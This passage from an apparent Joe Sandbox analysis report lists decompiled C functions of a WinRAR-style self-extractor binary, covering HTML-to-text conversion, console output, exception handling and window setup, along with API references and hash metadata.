                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: __vswprintf_c_l_swprintf_wcslen
                                                    • String ID: ;%u$x%u$xc%u
                                                    • API String ID: 3053425827-2277559157
                                                    • Opcode ID: 88cb60be4391e8d7d7e068f1712914438104a59be05b1e7f89db1b4396a3572e
                                                    • Instruction ID: bd91396eb8300915779c9058e1ec88604a07e9299aa538cc05306b0cc441069c
                                                    • Opcode Fuzzy Hash: 88cb60be4391e8d7d7e068f1712914438104a59be05b1e7f89db1b4396a3572e
                                                    • Instruction Fuzzy Hash: 6EF116716083809BDB25EF28C4E5FFE77996F90300F08056DFD8A9B283CB649A45D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E00CD9CFE(void* __eflags, signed short* _a4) {
                                                    				signed int* _v4;
                                                    				intOrPtr _v8;
                                                    				void* __ecx;
                                                    				signed int* _t17;
                                                    				signed int _t18;
                                                    				void* _t21;
                                                    				void* _t22;
                                                    				void* _t24;
                                                    				signed short _t25;
                                                    				void* _t26;
                                                    				signed int _t27;
                                                    				signed int _t28;
                                                    				signed short* _t29;
                                                    				void* _t30;
                                                    				signed int _t31;
                                                    				signed int _t32;
                                                    				void* _t33;
                                                    				signed int _t36;
                                                    				void* _t38;
                                                    				signed int _t42;
                                                    				signed int _t43;
                                                    				signed int _t44;
                                                    				signed short _t45;
                                                    				signed int _t47;
                                                    				short _t49;
                                                    				signed int _t50;
                                                    				signed int _t51;
                                                    				signed int _t52;
                                                    				signed short* _t53;
                                                    				signed int* _t55;
                                                    				short* _t56;
                                                    				short* _t57;
                                                    				signed short* _t58;
                                                    				signed int* _t59;
                                                    				intOrPtr _t60;
                                                    				signed int* _t77;
                                                    
                                                    				_t58 = _a4;
                                                    				_push(2 + E00CE3E13(_t58) * 2);
                                                    				_t17 = E00CE3E33(_t38);
                                                    				_t59 = _t17;
                                                    				_v4 = _t59;
                                                    				if(_t59 == 0) {
                                                    					return _t17;
                                                    				}
                                                    				_t18 = E00CD95AA(_t58);
                                                    				_t42 =  *_t58 & 0x0000ffff;
                                                    				_t36 = _t18;
                                                    				_t55 = _t59;
                                                    				if(_t42 == 0) {
                                                    					L47:
                                                    					return _t59;
                                                    				} else {
                                                    					_push(0xd);
                                                    					_push(0x20);
                                                    					_v8 = 0x3e;
                                                    					do {
                                                    						_t43 = _t42 & 0x0000ffff;
                                                    						while(_t43 != 0x3c) {
                                                    							if(_t36 == 0) {
                                                    								L11:
                                                    								_t36 = 0;
                                                    								__eflags = 0;
                                                    								if(0 == 0) {
                                                    									L20:
                                                    									_t27 =  *_t58 & 0x0000ffff;
                                                    									__eflags = _t27;
                                                    									if(__eflags == 0) {
                                                    										L27:
                                                    										_t28 =  *_t58 & 0x0000ffff;
                                                    										_t52 = 0x20;
                                                    										_t43 = _t28;
                                                    										_t72 = _t28;
                                                    										_t26 = 0xd;
                                                    										if(_t28 != 0) {
                                                    											continue;
                                                    										}
                                                    										break;
                                                    									}
                                                    									__eflags = _t27 - _t52;
                                                    									if(__eflags != 0) {
                                                    										L24:
                                                    										 *_t55 = _t27;
                                                    										L25:
                                                    										_t55 =  &(_t55[0]);
                                                    										L26:
                                                    										_t58 =  &(_t58[1]);
                                                    										goto L27;
                                                    									}
                                                    									__eflags = _t55 - _t59;
                                                    									if(__eflags == 0) {
                                                    										goto L24;
                                                    									}
                                                    									__eflags =  *((intOrPtr*)(_t55 - 2)) - _t52;
                                                    									if(__eflags == 0) {
                                                    										goto L26;
                                                    									}
                                                    									goto L24;
                                                    								}
                                                    								__eflags = _t43 - 0x26;
                                                    								if(_t43 != 0x26) {
                                                    									goto L20;
                                                    								}
                                                    								_t29 = 0;
                                                    								__eflags = 0;
                                                    								do {
                                                    									_t53 = _t29 + _t58;
                                                    									_t47 =  *_t53 & 0x0000ffff;
                                                    									__eflags = _t47;
                                                    									if(_t47 == 0) {
                                                    										break;
                                                    									}
                                                    									__eflags = _t47 - 0x3b;
                                                    									if(_t47 == 0x3b) {
                                                    										_t8 =  &(_t53[1]); // 0x22
                                                    										_t58 = _t8;
                                                    										_t36 = 1;
                                                    									}
                                                    									_t29 = _t29 + 2;
                                                    									__eflags = _t29 - 0x28;
                                                    								} while (_t29 < 0x28);
                                                    								__eflags = _t36;
                                                    								if(__eflags != 0) {
                                                    									goto L27;
                                                    								}
                                                    								_t52 = 0x20;
                                                    								goto L20;
                                                    							}
                                                    							if(_t43 == _t26) {
                                                    								L8:
                                                    								if(_t55 == _t59 ||  *((intOrPtr*)(_t55 - 2)) != _t52) {
                                                    									 *_t55 = _t52;
                                                    									goto L25;
                                                    								} else {
                                                    									goto L26;
                                                    								}
                                                    							}
                                                    							_t30 = 0xa;
                                                    							if(_t43 != _t30) {
                                                    								goto L11;
                                                    							}
                                                    							goto L8;
                                                    						}
                                                    						_t21 = E00CD1FDD(_t72, _t58, L"</p>", 4);
                                                    						_t36 = _t36 & 0xffffff00 | _t21 == 0x00000000;
                                                    						_t74 = _t21;
                                                    						if(_t21 == 0 || E00CD1FDD(_t74, _t58, L"<br>", 4) == 0) {
                                                    							_t44 = 0xd;
                                                    							_t22 = 2;
                                                    							 *_t55 = _t44;
                                                    							_t56 = _t55 + _t22;
                                                    							_t49 = 0xa;
                                                    							 *_t56 = _t49;
                                                    							_t55 = _t56 + _t22;
                                                    							if(_t36 != 0) {
                                                    								 *_t55 = _t44;
                                                    								_t57 = _t55 + _t22;
                                                    								 *_t57 = _t49;
                                                    								_t55 = _t57 + _t22;
                                                    								_t77 = _t55;
                                                    							}
                                                    						}
                                                    						 *_t55 = 0;
                                                    						_t24 = E00CD1FDD(_t77, _t58, L"<style>", 7);
                                                    						_t45 =  *_t58 & 0x0000ffff;
                                                    						_t50 = _t45;
                                                    						if(_t24 != 0) {
                                                    							_t51 = _t45;
                                                    							__eflags = _t45;
                                                    							if(_t45 == 0) {
                                                    								L44:
                                                    								_t25 = _t51 & 0x0000ffff;
                                                    								__eflags = _t51 - _v8;
                                                    								if(__eflags == 0) {
                                                    									_t58 =  &(_t58[1]);
                                                    									__eflags = _t58;
                                                    									_t25 =  *_t58 & 0x0000ffff;
                                                    								}
                                                    								goto L46;
                                                    							}
                                                    							_t60 = _v8;
                                                    							while(1) {
                                                    								_t51 = _t45 & 0x0000ffff;
                                                    								__eflags = _t45 - _t60;
                                                    								if(_t45 == _t60) {
                                                    									break;
                                                    								}
                                                    								_t58 =  &(_t58[1]);
                                                    								_t31 =  *_t58 & 0x0000ffff;
                                                    								_t45 = _t31;
                                                    								_t51 = _t31;
                                                    								__eflags = _t31;
                                                    								if(_t31 != 0) {
                                                    									continue;
                                                    								}
                                                    								break;
                                                    							}
                                                    							_t59 = _v4;
                                                    							goto L44;
                                                    						} else {
                                                    							_t32 = _t50;
                                                    							_t79 = _t45;
                                                    							if(_t45 == 0) {
                                                    								L38:
                                                    								_t25 = _t32 & 0x0000ffff;
                                                    								goto L46;
                                                    							} else {
                                                    								goto L34;
                                                    							}
                                                    							while(1) {
                                                    								L34:
                                                    								_t33 = E00CD1FDD(_t79, _t58, L"</style>", 8);
                                                    								_t58 =  &(_t58[1]);
                                                    								if(_t33 == 0) {
                                                    									break;
                                                    								}
                                                    								_t32 =  *_t58 & 0x0000ffff;
                                                    								if(_t32 != 0) {
                                                    									continue;
                                                    								}
                                                    								goto L38;
                                                    							}
                                                    							_t58 =  &(_t58[7]);
                                                    							__eflags = _t58;
                                                    							_t32 =  *_t58 & 0x0000ffff;
                                                    							goto L38;
                                                    						}
                                                    						L46:
                                                    						_t52 = 0x20;
                                                    						_t42 = _t25 & 0x0000ffff;
                                                    						_t26 = 0xd;
                                                    					} while (_t25 != 0);
                                                    					goto L47;
                                                    				}
                                                    			}

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID: </p>$</style>$<br>$<style>$>
                                                    • API String ID: 176396367-3568243669
                                                    • Opcode ID: 8639ca1030e84c5f529d129a6f453bfd679af5a635257a744625496847d08ccf
                                                    • Instruction ID: 6ff7ba4a208aa532897f291575f68526f314e0ada4a5112e245f6565554f92b2
                                                    • Opcode Fuzzy Hash: 8639ca1030e84c5f529d129a6f453bfd679af5a635257a744625496847d08ccf
                                                    • Instruction Fuzzy Hash: F551046E74032295DB30AA259811777B3E2DFA5750F68042BFFD18B7C0FB758E818261
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                    			E00CEF68D(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                    				signed int _v8;
                                                    				signed char _v15;
                                                    				char _v16;
                                                    				void _v24;
                                                    				short _v28;
                                                    				char _v31;
                                                    				void _v32;
                                                    				long _v36;
                                                    				intOrPtr _v40;
                                                    				void* _v44;
                                                    				signed int _v48;
                                                    				signed char* _v52;
                                                    				long _v56;
                                                    				int _v60;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t78;
                                                    				signed int _t80;
                                                    				int _t86;
                                                    				void* _t92;
                                                    				void* _t94;
                                                    				long _t97;
                                                    				void _t105;
                                                    				void* _t112;
                                                    				signed int _t115;
                                                    				signed int _t117;
                                                    				signed char _t122;
                                                    				signed char _t127;
                                                    				signed int _t128;
                                                    				signed char* _t129;
                                                    				intOrPtr* _t130;
                                                    				signed int _t131;
                                                    				void* _t132;
                                                    
                                                    				_t78 =  *0xcfe7ac; // 0x349e4b74
                                                    				_v8 = _t78 ^ _t131;
                                                    				_t80 = _a8;
                                                    				_t117 = _t80 >> 6;
                                                    				_t115 = (_t80 & 0x0000003f) * 0x30;
                                                    				_t129 = _a12;
                                                    				_v52 = _t129;
                                                    				_v48 = _t117;
                                                    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xd22290 + _t117 * 4)) + _t115 + 0x18));
                                                    				_v40 = _a16 + _t129;
                                                    				_t86 = GetConsoleCP();
                                                    				_t130 = _a4;
                                                    				_v60 = _t86;
                                                    				 *_t130 = 0;
                                                    				 *((intOrPtr*)(_t130 + 4)) = 0;
                                                    				 *((intOrPtr*)(_t130 + 8)) = 0;
                                                    				while(_t129 < _v40) {
                                                    					_v28 = 0;
                                                    					_v31 =  *_t129;
                                                    					_t128 =  *(0xd22290 + _v48 * 4);
                                                    					_t122 =  *(_t128 + _t115 + 0x2d);
                                                    					if((_t122 & 0x00000004) == 0) {
                                                    						_t92 = E00CEA767(_t115, _t128);
                                                    						_t128 = 0x8000;
                                                    						if(( *(_t92 + ( *_t129 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                    							_push(1);
                                                    							_push(_t129);
                                                    							goto L8;
                                                    						} else {
                                                    							if(_t129 >= _v40) {
                                                    								_t128 = _v48;
                                                    								 *((char*)( *((intOrPtr*)(0xd22290 + _t128 * 4)) + _t115 + 0x2e)) =  *_t129;
                                                    								 *( *((intOrPtr*)(0xd22290 + _t128 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0xd22290 + _t128 * 4)) + _t115 + 0x2d) | 0x00000004;
                                                    								 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
                                                    							} else {
                                                    								_t112 = E00CE930D( &_v28, _t129, 2);
                                                    								_t132 = _t132 + 0xc;
                                                    								if(_t112 != 0xffffffff) {
                                                    									_t129 =  &(_t129[1]);
                                                    									goto L9;
                                                    								}
                                                    							}
                                                    						}
                                                    					} else {
                                                    						_t127 = _t122 & 0x000000fb;
                                                    						_v16 =  *((intOrPtr*)(_t128 + _t115 + 0x2e));
                                                    						_push(2);
                                                    						_v15 = _t127;
                                                    						 *(_t128 + _t115 + 0x2d) = _t127;
                                                    						_push( &_v16);
                                                    						L8:
                                                    						_push( &_v28);
                                                    						_t94 = E00CE930D();
                                                    						_t132 = _t132 + 0xc;
                                                    						if(_t94 != 0xffffffff) {
                                                    							L9:
                                                    							_t129 =  &(_t129[1]);
                                                    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                    							_v56 = _t97;
                                                    							if(_t97 != 0) {
                                                    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                    									L19:
                                                    									 *_t130 = GetLastError();
                                                    								} else {
                                                    									_t48 = _t130 + 8; // 0xff76e900
                                                    									 *((intOrPtr*)(_t130 + 4)) =  *_t48 - _v52 + _t129;
                                                    									if(_v36 >= _v56) {
                                                    										if(_v31 != 0xa) {
                                                    											goto L16;
                                                    										} else {
                                                    											_t105 = 0xd;
                                                    											_v32 = _t105;
                                                    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                    												goto L19;
                                                    											} else {
                                                    												if(_v36 >= 1) {
                                                    													 *((intOrPtr*)(_t130 + 8)) =  *((intOrPtr*)(_t130 + 8)) + 1;
                                                    													 *((intOrPtr*)(_t130 + 4)) =  *((intOrPtr*)(_t130 + 4)) + 1;
                                                    													goto L16;
                                                    												}
                                                    											}
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    					goto L20;
                                                    					L16:
                                                    				}
                                                    				L20:
                                                    				return E00CDFBBC(_t130, _t115, _v8 ^ _t131, _t128, _t129, _t130);
                                                    			}

                                                    APIs
                                                    • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CEFE02,00000000,00000000,00000000,00000000,00000000,00CE529F), ref: 00CEF6CF
                                                    • __fassign.LIBCMT ref: 00CEF74A
                                                    • __fassign.LIBCMT ref: 00CEF765
                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00CEF78B
                                                    • WriteFile.KERNEL32(?,00000000,00000000,00CEFE02,00000000,?,?,?,?,?,?,?,?,?,00CEFE02,00000000), ref: 00CEF7AA
                                                    • WriteFile.KERNEL32(?,00000000,00000001,00CEFE02,00000000,?,?,?,?,?,?,?,?,?,00CEFE02,00000000), ref: 00CEF7E3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                    • String ID:
                                                    • API String ID: 1324828854-0
                                                    • Opcode ID: 035dd0f523052ea948ecadd1d73fdb4d310ab347bef2ac389915fb1f7b841057
                                                    • Instruction ID: a59308952565a12aad10b89e7d33d016f83caa2b6081c8ab4881ef758cc7ecbd
                                                    • Opcode Fuzzy Hash: 035dd0f523052ea948ecadd1d73fdb4d310ab347bef2ac389915fb1f7b841057
                                                    • Instruction Fuzzy Hash: BC5195B1900289AFDB10CFA5DC55BEEBBF4EF09300F14416EE555E7291D630AA42CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E00CE2900(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                    				char _v5;
                                                    				signed int _v12;
                                                    				char _v16;
                                                    				intOrPtr _v20;
                                                    				intOrPtr _v24;
                                                    				intOrPtr _v28;
                                                    				char _v32;
                                                    				char _t52;
                                                    				signed int _t59;
                                                    				intOrPtr _t60;
                                                    				void* _t61;
                                                    				intOrPtr* _t62;
                                                    				intOrPtr _t64;
                                                    				intOrPtr _t67;
                                                    				intOrPtr _t72;
                                                    				intOrPtr* _t76;
                                                    				intOrPtr _t77;
                                                    				signed int _t81;
                                                    				char _t83;
                                                    				intOrPtr _t86;
                                                    				intOrPtr _t93;
                                                    				intOrPtr _t96;
                                                    				intOrPtr* _t98;
                                                    				void* _t102;
                                                    				void* _t104;
                                                    				void* _t111;
                                                    
                                                    				_t89 = __edx;
                                                    				_t76 = _a4;
                                                    				_push(__edi);
                                                    				_v5 = 0;
                                                    				_v16 = 1;
                                                    				 *_t76 = E00CF2567(__ecx,  *_t76);
                                                    				_t77 = _a8;
                                                    				_t6 = _t77 + 0x10; // 0x11
                                                    				_t96 = _t6;
                                                    				_push(_t96);
                                                    				_v20 = _t96;
                                                    				_v12 =  *(_t77 + 8) ^  *0xcfe7ac;
                                                    				E00CE28C0(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0xcfe7ac);
                                                    				E00CE396C(_a12);
                                                    				_t52 = _a4;
                                                    				_t104 = _t102 - 0x1c + 0x10;
                                                    				_t93 =  *((intOrPtr*)(_t77 + 0xc));
                                                    				if(( *(_t52 + 4) & 0x00000066) != 0) {
                                                    					__eflags = _t93 - 0xfffffffe;
                                                    					if(_t93 != 0xfffffffe) {
                                                    						_t89 = 0xfffffffe;
                                                    						E00CE3AF0(_t77, 0xfffffffe, _t96, 0xcfe7ac);
                                                    						goto L13;
                                                    					}
                                                    					goto L14;
                                                    				} else {
                                                    					_v32 = _t52;
                                                    					_v28 = _a12;
                                                    					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
                                                    					if(_t93 == 0xfffffffe) {
                                                    						L14:
                                                    						return _v16;
                                                    					} else {
                                                    						do {
                                                    							_t81 = _v12;
                                                    							_t59 = _t93 + (_t93 + 2) * 2;
                                                    							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
                                                    							_t60 = _t81 + _t59 * 4;
                                                    							_t82 =  *((intOrPtr*)(_t60 + 4));
                                                    							_v24 = _t60;
                                                    							if( *((intOrPtr*)(_t60 + 4)) == 0) {
                                                    								_t83 = _v5;
                                                    								goto L7;
                                                    							} else {
                                                    								_t89 = _t96;
                                                    								_t61 = E00CE3A90(_t82, _t96);
                                                    								_t83 = 1;
                                                    								_v5 = 1;
                                                    								_t111 = _t61;
                                                    								if(_t111 < 0) {
                                                    									_v16 = 0;
                                                    									L13:
                                                    									_push(_t96);
                                                    									E00CE28C0(_t77, _t89, _t93, _t96, _v12);
                                                    									goto L14;
                                                    								} else {
                                                    									if(_t111 > 0) {
                                                    										_t62 = _a4;
                                                    										__eflags =  *_t62 - 0xe06d7363;
                                                    										if( *_t62 == 0xe06d7363) {
                                                    											__eflags =  *0xcf58dc;
                                                    											if(__eflags != 0) {
                                                    												_t72 = E00CF2090(__eflags, 0xcf58dc);
                                                    												_t104 = _t104 + 4;
                                                    												__eflags = _t72;
                                                    												if(_t72 != 0) {
                                                    													_t98 =  *0xcf58dc; // 0xce0150
                                                    													 *0xcf3278(_a4, 1);
                                                    													 *_t98();
                                                    													_t96 = _v20;
                                                    													_t104 = _t104 + 8;
                                                    												}
                                                    												_t62 = _a4;
                                                    											}
                                                    										}
                                                    										_t90 = _t62;
                                                    										E00CE3AD0(_t62, _a8, _t62);
                                                    										_t64 = _a8;
                                                    										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
                                                    										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
                                                    											_t90 = _t93;
                                                    											E00CE3AF0(_t64, _t93, _t96, 0xcfe7ac);
                                                    											_t64 = _a8;
                                                    										}
                                                    										_push(_t96);
                                                    										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
                                                    										E00CE28C0(_t77, _t90, _t93, _t96, _v12);
                                                    										_t86 =  *((intOrPtr*)(_v24 + 8));
                                                    										E00CE3AB0();
                                                    										asm("int3");
                                                    										__eflags = E00CE3B07();
                                                    										if(__eflags != 0) {
                                                    											_t67 = E00CE2B8C(_t86, __eflags);
                                                    											__eflags = _t67;
                                                    											if(_t67 != 0) {
                                                    												return 1;
                                                    											} else {
                                                    												E00CE3B43();
                                                    												goto L24;
                                                    											}
                                                    										} else {
                                                    											L24:
                                                    											__eflags = 0;
                                                    											return 0;
                                                    										}
                                                    									} else {
                                                    										goto L7;
                                                    									}
                                                    								}
                                                    							}
                                                    							goto L28;
                                                    							L7:
                                                    							_t93 = _t77;
                                                    						} while (_t77 != 0xfffffffe);
                                                    						if(_t83 != 0) {
                                                    							goto L13;
                                                    						}
                                                    						goto L14;
                                                    					}
                                                    				}
                                                    				L28:
                                                    			}

                                                    APIs
                                                    • _ValidateLocalCookies.LIBCMT ref: 00CE2937
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00CE293F
                                                    • _ValidateLocalCookies.LIBCMT ref: 00CE29C8
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00CE29F3
                                                    • _ValidateLocalCookies.LIBCMT ref: 00CE2A48
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 1170836740-1018135373
                                                    • Opcode ID: a80ae5081d7dac65efdab6e7c0c047b07bd01f21fc7b29a8eb0763e1043bc4c0
                                                    • Instruction ID: a4af6e600449a7f7ed2bdb41fd1e18e2add349fdd0cd8f94d7abb16488d73d64
                                                    • Opcode Fuzzy Hash: a80ae5081d7dac65efdab6e7c0c047b07bd01f21fc7b29a8eb0763e1043bc4c0
                                                    • Instruction Fuzzy Hash: F141DB30A00288AFCF10DF6AC885BAE7BB9EF44314F148065E9159B393D771DA41DF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 38%
                                                    			E00CD9ED5(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
                                                    				struct tagRECT _v16;
                                                    				intOrPtr _v28;
                                                    				intOrPtr _v36;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				intOrPtr _t33;
                                                    				intOrPtr _t34;
                                                    				struct HWND__* _t44;
                                                    				intOrPtr* _t52;
                                                    				void* _t60;
                                                    				WCHAR* _t67;
                                                    				struct HWND__* _t68;
                                                    
                                                    				_t68 = _a8;
                                                    				_t52 = __ecx;
                                                    				 *(__ecx + 8) = _t68;
                                                    				 *((char*)(__ecx + 0x26)) = _a20;
                                                    				ShowWindow(_t68, 0);
                                                    				E00CD9C04(_t52, _a4);
                                                    				if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
                                                    					L00CE3E2E( *((intOrPtr*)(_t52 + 0x1c)));
                                                    				}
                                                    				if(_a12 != 0) {
                                                    					_push(_a12);
                                                    					_t33 = E00CE7625(_t52, _t60);
                                                    				} else {
                                                    					_t33 = 0;
                                                    				}
                                                    				 *((intOrPtr*)(_t52 + 0x1c)) = _t33;
                                                    				if(_a16 != 0) {
                                                    					_push(_a16);
                                                    					_t34 = E00CE7625(_t52, _t60);
                                                    				} else {
                                                    					_t34 = 0;
                                                    				}
                                                    				 *((intOrPtr*)(_t52 + 0x20)) = _t34;
                                                    				GetWindowRect(_t68,  &_v16);
                                                    				 *0xd23108(0,  *0xd23154(_t68,  &_v16, 2));
                                                    				if( *(_t52 + 4) != 0) {
                                                    					 *0xd23110( *(_t52 + 4));
                                                    				}
                                                    				_t40 = _v36;
                                                    				_t20 = _t40 + 1; // 0x1
                                                    				_t44 =  *0xd23118(0, L"RarHtmlClassName", 0, 0x40000000, _t20, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xd23154(_t68, 0,  *_t52, _t52, _t60));
                                                    				 *(_t52 + 4) = _t44;
                                                    				if( *((intOrPtr*)(_t52 + 0x10)) != 0) {
                                                    					__eflags = _t44;
                                                    					if(_t44 != 0) {
                                                    						ShowWindow(_t44, 5);
                                                    						return  *0xd2310c( *(_t52 + 4));
                                                    					}
                                                    				} else {
                                                    					if(_t68 != 0 &&  *((intOrPtr*)(_t52 + 0x20)) == 0) {
                                                    						_t78 =  *((intOrPtr*)(_t52 + 0x1c));
                                                    						if( *((intOrPtr*)(_t52 + 0x1c)) != 0) {
                                                    							_t44 = E00CD9CFE(_t78,  *((intOrPtr*)(_t52 + 0x1c)));
                                                    							_t67 = _t44;
                                                    							if(_t67 != 0) {
                                                    								ShowWindow(_t68, 5);
                                                    								SetWindowTextW(_t68, _t67);
                                                    								return L00CE3E2E(_t67);
                                                    							}
                                                    						}
                                                    					}
                                                    				}
                                                    				return _t44;
                                                    			}
















                                                    APIs
                                                    • ShowWindow.USER32(?,00000000), ref: 00CD9EEE
                                                    • GetWindowRect.USER32(?,00000000), ref: 00CD9F44
                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 00CD9FDB
                                                    • SetWindowTextW.USER32(?,00000000), ref: 00CD9FE3
                                                    • ShowWindow.USER32(00000000,00000005), ref: 00CD9FF9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$RectText
                                                    • String ID: RarHtmlClassName
                                                    • API String ID: 3937224194-1658105358
                                                    • Opcode ID: c86f255045f3c22ae948310aec675c69deb7a8116bcda6c86acea3491f7a932d
                                                    • Instruction ID: fdb64cb1e31c66fde1bc8965ee3f7b0f7c71133d067d59caa11f01cad1c1a818
                                                    • Opcode Fuzzy Hash: c86f255045f3c22ae948310aec675c69deb7a8116bcda6c86acea3491f7a932d
                                                    • Instruction Fuzzy Hash: BA41D331004310EFCB225FA5DC48B6B7BA8FF58701F00455AFA4AEA256DB38EA15CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 87%
                                                    			E00CD9955(void* __edx, void* __eflags) {
                                                    				void* __ecx;
                                                    				signed int _t25;
                                                    				void* _t29;
                                                    				signed int _t30;
                                                    				intOrPtr _t31;
                                                    				void* _t35;
                                                    				signed int _t38;
                                                    				signed int _t45;
                                                    				void* _t51;
                                                    				signed short* _t52;
                                                    				void* _t53;
                                                    				signed short* _t55;
                                                    				signed short* _t57;
                                                    				signed short* _t58;
                                                    				void* _t59;
                                                    				void* _t60;
                                                    
                                                    				_t57 =  *(_t59 + 0x10);
                                                    				_push(0x200 + E00CE3E13(_t57) * 0xc);
                                                    				_t52 = E00CE3E33(0x200 + E00CE3E13(_t57) * 0xc);
                                                    				 *(_t59 + 0x10) = _t52;
                                                    				if(_t52 != 0) {
                                                    					E00CE6066(_t52, L"<style>body{font-family:\"Arial\";font-size:12;}</style>");
                                                    					_t38 = E00CE3E13(_t52);
                                                    					_t60 = _t59 + 0xc;
